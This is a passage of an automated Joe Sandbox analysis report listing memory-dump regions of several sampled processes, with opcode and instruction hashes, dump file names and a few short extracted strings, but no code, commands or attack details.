                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: 0ebb8008c8aa52596a5baca2a055c8ed622b73bcf0a29714cd5fd3f58db3e768
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: B0E01224D0C11A4FF755F614C8517BD6261BF94340F5400B4D52DB36D2CF787D804749
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bf13e036f4edc9b53d0d0af8e3e61debb82d912effd663b3793d36e5be8d87e
                                                      • Instruction ID: fd5e002d15d490e9fc1417daa2cbb9a4321dfeb680e7be21b7b08ebdf7e14038
                                                      • Opcode Fuzzy Hash: 2bf13e036f4edc9b53d0d0af8e3e61debb82d912effd663b3793d36e5be8d87e
                                                      • Instruction Fuzzy Hash: 59E0123150A7854FC30A9B28C8A99547FB0EF27211B9701D7C005CF573D61DDC99C751
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction ID: 604417b3b3542cd8c60929ed4a2d5b0b4ca1cb7ae624cf3b0c4c760a0363f089
                                                      • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction Fuzzy Hash: 97D01234B549054FC70CBA388C99C747391EB6E216B9540A9D00AD73B5DA6ADC89C741
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction ID: 11a9089a325351e74b09ddd1052655bbc03aa67a49e6dbc6211aa68b6dca963e
                                                      • Opcode Fuzzy Hash: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction Fuzzy Hash: BED01234B549084FC70CB738D85987473A1EB6A216B9540A9D00AC72B1DAAADC89C741
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cf08b807beb86177fe26698fcde08e7472f0c944b41054036d67487a8be95b2
                                                      • Instruction ID: 307375f2f39e48a3ce7c2fd4ed40096ef78becb920e82222f69354ac1956991e
                                                      • Opcode Fuzzy Hash: 4cf08b807beb86177fe26698fcde08e7472f0c944b41054036d67487a8be95b2
                                                      • Instruction Fuzzy Hash: 22C08C305118088FC70CFB2CC89DD60B3E0FB2A201F9200A8D40ECB531EB6A9DE8CB81
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2459dfd473110f01f9f758a342bca385b6d1d4eba8c212df4711e3556a64e517
                                                      • Instruction ID: f6e8f5b2d4a0d360fabfe89d4e336e5d1ba4446c3605bd40320e00ab350fea36
                                                      • Opcode Fuzzy Hash: 2459dfd473110f01f9f758a342bca385b6d1d4eba8c212df4711e3556a64e517
                                                      • Instruction Fuzzy Hash: 0DD05E2192CA5A4EEB92B770C41A2BE52E2BF10350F8804B8D84EB71D3CF7D34405A84
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: b243ce1c8409a49d89244fcce7777f365d9495397e16b6a7a0611b65a11a5de0
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 4CC08C00D1F52B08E445312F14020ACA2007FC46A4FD00032C01C70092AEAD30C5024E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.2332969496.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_7ff848e50000_4ra1Fo2Zql.jbxd
                                                      • Opcode ID: a7f1e62f3cbb6283991f3b626f1a4b753455670a3c222f9e522e663140620036
                                                      • Instruction ID: a3a522484715945d4e2b20b52116875a4ff3ea2099a8acd90016f2f80befa4f0
                                                      • Opcode Fuzzy Hash: a7f1e62f3cbb6283991f3b626f1a4b753455670a3c222f9e522e663140620036
                                                      • Instruction Fuzzy Hash: A55137D6ACE8627DE11D36FDB4415FD6B48EF852B8F0C9677E04C890838E1860858AFD
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5\_H$<P_^
                                                      • API String ID: 0-2257120494
                                                      • Opcode ID: 51007bf3465af3c2f5c4d055fc6adbd850737fb1d03557a55fdf25353996c37a
                                                      • Instruction ID: de52f35587a2877f145ed28e5f7c6b367b28e60bbbf84209f56f3957f381a79b
                                                      • Opcode Fuzzy Hash: 51007bf3465af3c2f5c4d055fc6adbd850737fb1d03557a55fdf25353996c37a
                                                      • Instruction Fuzzy Hash: 34910FB0D1CA899FE789EF6888697A9BFE1FB96750F0401BED009D72D2DB782405C711
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: JH
                                                      • API String ID: 0-1110330275
                                                      • Opcode ID: a9e13b31a14580615ecc3330b56d72602964710bb357e148f4dc11d04e207cb6
                                                      • Instruction ID: ada1d63b1527a00983e3b0d71e8172e8e0a575f5c23f3a110cb823bde4460e6c
                                                      • Opcode Fuzzy Hash: a9e13b31a14580615ecc3330b56d72602964710bb357e148f4dc11d04e207cb6
                                                      • Instruction Fuzzy Hash: 8932A321E1CD5A9FEA99FA2884956B873E2FF94780F4441B9D00DD3287DF39BC428785
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L_H
                                                      • API String ID: 0-402390507
                                                      • Opcode ID: 150d7a2cdea911aa89175b5207eecf0953c95617b9798ae1a70095e85aa4cd7c
                                                      • Instruction ID: c0b8ffada0d06663e0bae6ed3285fcbd40de4b46cf9007f5d4a018bd8c122525
                                                      • Opcode Fuzzy Hash: 150d7a2cdea911aa89175b5207eecf0953c95617b9798ae1a70095e85aa4cd7c
                                                      • Instruction Fuzzy Hash: DA819021E1CD8A5FEA98FA2C84563B973D2FF59781F8451B9D40DC32C7DE38A8418785
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L_H
                                                      • API String ID: 0-402390507
                                                      • Opcode ID: 41e3e96f56ef98869561ea4c8e9198bce43167bff8c15aee31467ea67342a1c6
                                                      • Instruction ID: 7e48b810852f80ef8bb14a1130bae11b4812987a8cc046ce30fa386e3f137131
                                                      • Opcode Fuzzy Hash: 41e3e96f56ef98869561ea4c8e9198bce43167bff8c15aee31467ea67342a1c6
                                                      • Instruction Fuzzy Hash: FF517221E1CD4A5FEB98FA6C84563B973D2FB98781F8491B9D40EC3287DE38A8414745
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: 884b935fe21e5beee21326acdb660c01b30ad89bbd1b1b814e7e9523caa8c666
                                                      • Instruction ID: 96e1521f755d44604ec613ebba67346e1c9af8096d442de4b9294235bc34c5e5
                                                      • Opcode Fuzzy Hash: 884b935fe21e5beee21326acdb660c01b30ad89bbd1b1b814e7e9523caa8c666
                                                      • Instruction Fuzzy Hash: 5DF06D71A4E7C44FCB1AEA348868458BFA0EF67601B4A41EEC046CF1E7EA2D9885C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1b155bba8e84488f59a7e0520d627fdf7e0c85e9f4cbc9179c2a97a25e109091
                                                      • Instruction ID: afac52e433d0857518583ae6b8924dc77729afd3a9f21939d5f8d0ee06b49a2d
                                                      • Opcode Fuzzy Hash: 1b155bba8e84488f59a7e0520d627fdf7e0c85e9f4cbc9179c2a97a25e109091
                                                      • Instruction Fuzzy Hash: CBE04F7194E7C54FDB0AFB34886A8543FA0EE6721178A40EED085CF1B3E62DD88AC701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: ab5bc52ccc84ba0a46e1ae635ea7e3e89fe45a12ed5d610c0e15ce8f43e4fa42
                                                      • Instruction ID: 828afeb58ec6ea49f52c83a1bb17ab3c40440e831410fd24b2f3616146c31bae
                                                      • Opcode Fuzzy Hash: ab5bc52ccc84ba0a46e1ae635ea7e3e89fe45a12ed5d610c0e15ce8f43e4fa42
                                                      • Instruction Fuzzy Hash: 44E0487154E7D44FCB0AEB3484698553F60EF6725578A40DEC045CF1F3E62D984AC701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: f19cede5c59fc4a0cb08a885fad295f4731a0a1441eb08b9cec326ea9453d205
                                                      • Instruction ID: 5ca437563a1a1a717193a0ff7e6609b635dde2699c548a657d9841eeb3367ba1
                                                      • Opcode Fuzzy Hash: f19cede5c59fc4a0cb08a885fad295f4731a0a1441eb08b9cec326ea9453d205
                                                      • Instruction Fuzzy Hash: B0E01A7184E7D44FCB4AEB74886A9543FA0EF6B211B8A40EEC045CF1B3E62D8849C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 8ce124dc7abdcb41ee7936ee3735b78eaac60abd6b3103a33d5c690c0f19498d
                                                      • Instruction ID: e3672f46c80dc115ecc7273e3dac629158cbbb2b0e0f2e113172e60720cf181d
                                                      • Opcode Fuzzy Hash: 8ce124dc7abdcb41ee7936ee3735b78eaac60abd6b3103a33d5c690c0f19498d
                                                      • Instruction Fuzzy Hash: F4E0D87144E7C04FC706EB7488698097FA0EE2724078B40EEC045CF1B3E22D8845C701
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 933c6249fb2e24eecc1489cd62a2c5a58d931f6f1326546cca73537b7a831822
                                                      • Instruction ID: a37c06329419195b5fe935331f2d0cb3863c9be72f863cd6a41fe3d08e24b0c4
                                                      • Opcode Fuzzy Hash: 933c6249fb2e24eecc1489cd62a2c5a58d931f6f1326546cca73537b7a831822
                                                      • Instruction Fuzzy Hash: 9C025E31E1C95A8FEB99FA6884916B9B3A1FF54780F5441B9D00DD3287CF39BC828B45
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ffbd7652aaac1a95ba09a5a227770c9d00a9739d108b62ea588d853606316154
                                                      • Instruction ID: a999fad9fd368aed81141015ee0060834d8e2247d5bb869a9a82e6692ab2c060
                                                      • Opcode Fuzzy Hash: ffbd7652aaac1a95ba09a5a227770c9d00a9739d108b62ea588d853606316154
                                                      • Instruction Fuzzy Hash: 6E415B92A4E9552EE308B7BCA0956FDBB80FF453A4F1845FBD04CC71D7DE2868818698
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c8d99719bc378567cf719af897c873e6ef95af42384c07d4f4f58627ca212226
                                                      • Instruction ID: 228a175af950f982f38f92d16dcacc0d1851e0413048382c04604d501e797789
                                                      • Opcode Fuzzy Hash: c8d99719bc378567cf719af897c873e6ef95af42384c07d4f4f58627ca212226
                                                      • Instruction Fuzzy Hash: EB31707190D68A8FDB46FB64C8659A9BBF0FF26340F0805FBD009D71A2DB399845C751
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 517011e782e7eedabede6bbb1b2bca8d4bcfa00d5987e039b1d8c85eb5fc41ad
                                                      • Instruction ID: ecd0bd045a85cae50d2cb750ee94941b87bae1d6cf494d3cf290c11e1c041a4f
                                                      • Opcode Fuzzy Hash: 517011e782e7eedabede6bbb1b2bca8d4bcfa00d5987e039b1d8c85eb5fc41ad
                                                      • Instruction Fuzzy Hash: C921F120B1D9595FE788F66C844A7B9B7C2FF99755F1000F9E40EC32D6DE28AC818688
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8757069202baedebd921ed1b31c442f342e54f784ec780075ec39ace15b624da
                                                      • Instruction ID: fdadde23bb3f8bbab27ea55cc291b43a219102b404c04c86a72125737a8d8b82
                                                      • Opcode Fuzzy Hash: 8757069202baedebd921ed1b31c442f342e54f784ec780075ec39ace15b624da
                                                      • Instruction Fuzzy Hash: 77318631E0C94A8FDB54FA18C4956BC77E2FB987A4F44427AC40ED72C6CF38A9418B85
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 424dcb16083359b8a07385a8893f11865e2333391f520f8989e2d54cb1a6af0a
                                                      • Instruction ID: f77b9a29282c89927d392e676bc7566e951348763eb8e1dbaa819ac613ad6401
                                                      • Opcode Fuzzy Hash: 424dcb16083359b8a07385a8893f11865e2333391f520f8989e2d54cb1a6af0a
                                                      • Instruction Fuzzy Hash: C8212891A4ED163EF65CB2BC644A6FCA2C1FF483A5F1440BAE40DC31D7DD2C68804698
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d32e3ed213fe05076173ee525118aea2c9b4828e6f80ec80579c9dee9078b6f
                                                      • Instruction ID: 7e8e4a0514a9d0dc8c8617fdfba27c782613f9a2ce432c282873c4b72fb4dcee
                                                      • Opcode Fuzzy Hash: 5d32e3ed213fe05076173ee525118aea2c9b4828e6f80ec80579c9dee9078b6f
                                                      • Instruction Fuzzy Hash: 6E214161E0C90A8FEBA4FAA884547BCA2D2FF94391F5546B5D40DD3293DE38AC418748
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 098383908c077743e58d5f082a83f3b561def0c71ba6caf4d8b85f466fd56e2a
                                                      • Instruction ID: ade824044f7b7ce70da989decd7b65504ac8125d5d9c863def52091015ce12df
                                                      • Opcode Fuzzy Hash: 098383908c077743e58d5f082a83f3b561def0c71ba6caf4d8b85f466fd56e2a
                                                      • Instruction Fuzzy Hash: D1219130A1CA198FDBA8EB188856BBD73F2FB58740F600079D44ED3281CF346D828B85
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d72b2a059344ca9a45099fc1f557cf23b98df3c06ac99695896507b6237289c0
                                                      • Instruction ID: bd7b56a498f3b5dc49a0337759260d75f0c3ca1234726802dd34f676a1b58f2b
                                                      • Opcode Fuzzy Hash: d72b2a059344ca9a45099fc1f557cf23b98df3c06ac99695896507b6237289c0
                                                      • Instruction Fuzzy Hash: A621D67190D689AFE711FFA8C4552ECBBB0FF52350F1445B6E044DB1C2DB3825468755
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c5ac5c6f397e6e13d8eeaf85f0fcdf6b03c38dee4f9392bef08223c4965f25f
                                                      • Instruction ID: a30cdf9ffeca2657aea3e24d503bc1daacc16cbe8224dd28cbaf0f4858dc47d6
                                                      • Opcode Fuzzy Hash: 3c5ac5c6f397e6e13d8eeaf85f0fcdf6b03c38dee4f9392bef08223c4965f25f
                                                      • Instruction Fuzzy Hash: ED114F21E0C91A4FEA98FB6884556B973D2FF98340F5005BAD40EE72D6DF38BC124784
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f43fb82b878838ec2a80412cc861bf7f2fe8e663d90cc19411dbc94d9653441
                                                      • Instruction ID: f5277cd8f5299ba2f35198a29593c1241578740743f74efb6a799141c5c4d2a4
                                                      • Opcode Fuzzy Hash: 8f43fb82b878838ec2a80412cc861bf7f2fe8e663d90cc19411dbc94d9653441
                                                      • Instruction Fuzzy Hash: 7A11A030E2CA198FDB98EB1888466BA77E1FB99740F5044B9C48DD3281CF34AD818F85
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ba2ce238f63109aecba46b24be2db8facca6e6befa5bf46bdb89211eb6591b5
                                                      • Instruction ID: 4bef5a812354499d5cd899f0f975a70da7f1a73c0b123f95f8cb28cd1a2d5504
                                                      • Opcode Fuzzy Hash: 9ba2ce238f63109aecba46b24be2db8facca6e6befa5bf46bdb89211eb6591b5
                                                      • Instruction Fuzzy Hash: 6E11DA70908A198FDB94EB08C894BA9B3F1FB58311F5441AAD40DE72A4CB34AEC4CF85
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d77f783aad2458c2800b9d4d9c4553bf8df1523cdcc4391c1fce8b81b5581b6
                                                      • Instruction ID: 143c2411044347730a3b37979d6936ed83f579208d15690f45e056ff2b82a719
                                                      • Opcode Fuzzy Hash: 7d77f783aad2458c2800b9d4d9c4553bf8df1523cdcc4391c1fce8b81b5581b6
                                                      • Instruction Fuzzy Hash: 8011E57190D7899FE702FFB8C8551DDBFB0EF42350F1545B6E040DB192DA3416498784
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 069208255a8f16878afe87ed4269f670172b69dc563c41a5ec61e3c23eab89b7
                                                      • Instruction ID: 6c584eec39f5069c27b048f1c64f1530521c7b06a2682f0663f053e740078e05
